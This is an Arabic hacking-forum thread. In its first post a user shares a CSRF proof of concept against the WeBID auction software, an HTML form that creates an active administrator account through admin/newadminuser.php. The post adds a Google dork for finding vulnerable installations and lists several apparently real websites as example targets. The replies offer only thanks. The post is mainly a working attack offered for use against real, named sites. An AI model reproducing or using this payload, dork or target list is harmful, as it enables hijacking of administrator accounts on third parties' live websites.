الكاتب : n4ss1m | المشاهدات : 3,029 | الردود : 3
حالة الموضوع:
مغلق
  1. n4ss1m

    n4ss1m Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    SQL
    كود PHP:
    ##################################################
    # Title :WeBID CSRF Vulnerability (All Version)  #
    # Author :n4ss1m                                 #
    # Date :12.MAR.30                                #
    # Security :LOW                                  #
    # Google Dork : allintext: "powered by webid"    #
    ##################################################

    Note :

    Works IF magic_quotes_gpc off .

    P0C :
    <
    form name="conf" action="http://domain.tld/path/admin/newadminuser.php" method="post">
    <
    table>
    <
    input type="text" name="username" value="n4ss1m">
    <
    input type="password" name="password" value="">
    <
    input type="password" name="repeatpassword" value="">
    </
    table>
    <
    input type="hidden" name="status" value="1">
    <
    input type="hidden" name="csrftoken" value="2ba424e53306e55aafba5914a68f8a7d">
    <
    input type="hidden" name="action" value="update">
    <
    input type="submit" name="act" class="centre" value="Submit">
    </
    form>


    Example Site :

    http://mcs-1.com/
    http://usedwiiu.com/
    http://neobroker.com/webid/
    http://advantekkshocks.com/WeBid/
    ( And More In Google :)

    ################################################################################################################
    # Special Thx To : Lito , Mr.Ps , The Injector , B0x ;) , Ked-Ans , Hacker-1420 , Mad Hacker'z ,               #
    # Sec4ever , Sec4Leb.com , iq-t34m.host.org , V4-team.com , Mr.Hacker , Xref , Y3OULS , Mr.NORVI , Mr.XKILler  #
    # And InJ3cT0R T34M , 1337day.com                                                                              #
    ################################################################################################################


    # 1337day.com [2012-03-30]
     
  2. n4ss1m

    n4ss1m Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    6
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الإقامة:
    SQL
    رد: WeBID CSRF Vulnerability All Version

    i:q3^:i:q3^:i:q3^:i:q3^:
     
  3. вαиɒєя

    вαиɒєя DeveloPer Plus

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    142
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الوظيفة:
    طآلب
    الإقامة:
    k.s.a
    رد: WeBID CSRF Vulnerability All Version

    الله يعطيك الف عافية
    &:":
     
  4. Dr.reo

    Dr.reo Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    58
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    الجزائر
    رد: WeBID CSRF Vulnerability All Version

    [font=ae_almothnna]بارك الله فيك
    واصل الى الأمام
    موفق
    &:":
    [/font]
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة